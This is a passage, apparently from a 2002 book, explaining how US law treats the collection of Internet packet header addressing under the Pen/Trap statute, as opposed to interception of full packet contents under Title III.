Cover art courtesy of Greg Kipper.
[…] Internet communicate with each other, they break down messages into discrete
chunks known as “packets,” and then send each packet out to its intended
destination. Every packet contains addressing information in the “header” of
the packet (much like the “to” and “from” addresses on an envelope), followed
by the content of the message (much like a letter inside an envelope). The
©2002 CRC Press LLC
Pen/Trap statute permits law enforcement to obtain the addressing information
of Internet communications much as it would addressing information for
traditional phone calls. See 18 U.S.C. § 3127(4) (defining “trap and trace device”
broadly as “a device which captures the incoming electronic or other impulses
which identify the originating number of an instrument or device from which
a wire or electronic communication was transmitted”). However, reading the
entire packet ordinarily implicates Title III. The primary difference between
an Internet pen/trap device and an Internet Title III intercept device (some-
times known as a “sniffer”) is that the former is programmed to capture and